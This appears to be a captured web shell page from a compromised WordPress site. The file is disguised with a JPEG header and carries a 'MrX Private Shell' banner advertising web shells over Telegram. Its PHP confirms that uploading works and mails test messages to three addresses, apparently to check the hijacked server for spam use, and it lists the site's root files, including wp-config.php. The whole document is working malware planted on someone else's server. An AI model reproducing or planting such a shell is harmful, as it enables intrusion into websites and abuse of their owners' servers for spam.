����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
// Enable error reporting for debugging purposes (remove in production)
error_reporting(E_ALL);
ini_set('display_errors', 1);
// Initialize variables for default email values
$defaultEmail1 = "";
$defaultEmail2 = "";
$defaultEmail3 = ""; // Add the third default email
// Define a function to send an email with error handling
function sendEmail($to, $subject, $message) {
if (mail($to, $subject, $message)) {
return true;
} else {
return false;
}
}
?>
<!-- Display a message indicating that upload is working -->
Upload is <b><span style="color: green">WORKING</span></b><br>
<!-- Display a message indicating that email checking is in progress -->
Check Mailing ..<br>
<!-- Create a form for users to input email addresses -->
<form method="post">
<input type="text" name="email1" value="<?php echo $defaultEmail1; ?>" >
<input type="text" name="email2" value="<?php echo $defaultEmail2; ?>" >
<input type="text" name="email3" value="<?php echo $defaultEmail3; ?>" > <!-- Add the third email input -->
<input type="submit" value="Send test >>">
</form>
<br>
<?php
// Check if the form has been submitted and all email fields are filled
if (!empty($_POST['email1']) && !empty($_POST['email2']) && !empty($_POST['email3'])) {
$xx = mt_rand(); // Generate a random number
// Send emails and handle errors
if (sendEmail($_POST['email1'], "Result Report Test - " . $xx, "WORKING !") &&
sendEmail($_POST['email2'], "Result Report Test - " . $xx, "WORKING !") &&
sendEmail($_POST['email3'], "Result Report Test - " . $xx, "WORKING !")) {
// Display a success message along with the email addresses
echo "<b>Successfully sent a report to [" . $_POST['email1'] . "], [" . $_POST['email2'] . "], and [" . $_POST['email3'] . "] - $xx</b>";
} else {
// Display a failure message if sending emails failed
echo "<b>Failed to send a report to [" . $_POST['email1'] . "], [" . $_POST['email2'] . "], and/or [" . $_POST['email3'] . "]</b>";
}
}
?>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| .well-known | Folder | 0755 |
|
|
| career | Folder | 0777 |
|
|
| cgi-bin | Folder | 0755 |
|
|
| sales | Folder | 0755 |
|
|
| wp-admin | Folder | 0755 |
|
|
| wp-content | Folder | 0755 |
|
|
| wp-includes | Folder | 0755 |
|
|
| File | 0 B | 0 |
|
|
| .htaccess | File | 197 B | 0444 |
|
| .htaccess.bk | File | 993 B | 0644 |
|
| admin.php | File | 5.24 KB | 0644 |
|
| aios-bootstrap.php | File | 919 B | 0644 |
|
| error_log | File | 37.99 KB | 0644 |
|
| pi.html | File | 451 B | 0644 |
|
| test.php | File | 2.06 KB | 0644 |
|
| wp-5zo9.php | File | 1.62 MB | 0644 |
|
| wp-activate.php | File | 7.18 KB | 0644 |
|
| wp-blog-header.php | File | 3.08 KB | 0644 |
|
| wp-comments-post.php | File | 2.27 KB | 0644 |
|
| wp-config.php | File | 3.75 KB | 0600 |
|
| wp-cron.php | File | 8.23 KB | 0644 |
|
| wp-links-opml.php | File | 2.43 KB | 0644 |
|
| wp-load.php | File | 3.84 KB | 0644 |
|
| wp-login.php | File | 50.23 KB | 0644 |
|
| wp-mail.php | File | 8.52 KB | 0644 |
|
| wp-settings.php | File | 30.33 KB | 0644 |
|
| wp-signup.php | File | 33.71 KB | 0644 |
|
| wp-trackback.php | File | 5.09 KB | 0644 |
|
| xmlrpc.php | File | 3.13 KB | 0644 |
|